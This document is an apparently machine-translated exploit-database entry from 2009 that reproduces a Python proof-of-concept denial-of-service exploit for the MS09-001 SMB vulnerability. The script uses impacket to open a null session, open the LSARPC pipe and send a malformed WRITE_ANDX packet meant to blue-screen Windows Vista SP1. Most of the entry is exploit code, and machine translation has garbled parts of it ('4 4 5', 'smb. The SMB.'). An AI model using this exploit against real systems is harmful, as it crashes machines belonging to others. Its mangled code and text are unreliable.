MS09-0 0 1 SMB Dos Poc Exploit-vulnerability warning-the black bar safety net

2009-06-08T00:00:00
ID MYHACK58:62200923483
Type myhack58
Reporter 佚名
Modified 2009-06-08T00:00:00

Description

Today with python to write a SMB dos poc, test vista sp1,

A packet in the past immediately a blue screen, but XP SP2 not work, because XP SP2 the following default does not allow null sessions to access the lsarpc,samr, etc. named pipes.

MS09-0 0 1 SMB Dos Vulnerabilities Poc Exploit

Author : vessial

http://hi.baidu.com/vessial

Tod

[+] test vista sp1,system BOSD

Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx

http://www.milw0rm.com/exploits/6463

import impacket from impacket import smb from impacket import nmb

remote = smb. SMBPacket(") r = the smb. SMB('*SMBSERVER','192.168.40.129',None,nmb. TYPE_SERVER,4 4 5) r. _login(",",",'WORKGROUP') tid = r. tree_connect_andx('\\\\192.168.40.129\\IPC$')

smb1 = smb. NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0xc807 smb1['Tid'] = tid

ntCreate = smb. SMBCommand(smb. The SMB. SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = smb. SMBNtCreateAndX_Parameters() ntCreate['Data'] = smb. SMBNtCreateAndX_Data() ntCreate['Parameters']['FileNameLength'] = 1 4 ntCreate['Parameters']['AndXOffset'] = 0xdede ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Parameters']['AccessMask'] = 0x2019f ntCreate['Parameters']['CreateOptions'] = 0x400040 ntCreate['Parameters']['ShareAccess'] = 7 ntCreate['Parameters']['Impersonation'] = 2 ntCreate['Parameters']['Disposition'] = 1

ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" smb1. addCommand(ntCreate) r. sendSMB(smb1)

recv=r. recvSMB() if recv. isValidAnswer(smb. The SMB. SMB_COM_NT_CREATE_ANDX): ntCreateResponse = smb. SMBCommand(recv['Data'][0]) ntCreateParameters =smb. SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters']) fid = ntCreateParameters['Fid']

smb1 = smb. NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0 smb1['Tid'] = tid data = "A"*7 2

writeAndX = smb. SMBCommand(smb. The SMB. SMB_COM_WRITE_ANDX)

smb1. addCommand(writeAndX)

writeAndX['Parameters'] = smb. SMBWriteAndX_Parameters() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['AndXOffset'] = 0xdede writeAndX['Parameters']['Offset'] = 0 writeAndX['Parameters']['WriteMode'] = 8 writeAndX['Parameters']['Remaining'] = len(data) writeAndX['Parameters']['_reserved'] = -1 writeAndX['Parameters']['DataLength'] = 0xffff writeAndX['Parameters']['DataOffset'] = 0xffff writeAndX['Parameters']['HighOffset'] = 0xcccccccc writeAndX['Data'] = data r. sendSMB(smb1)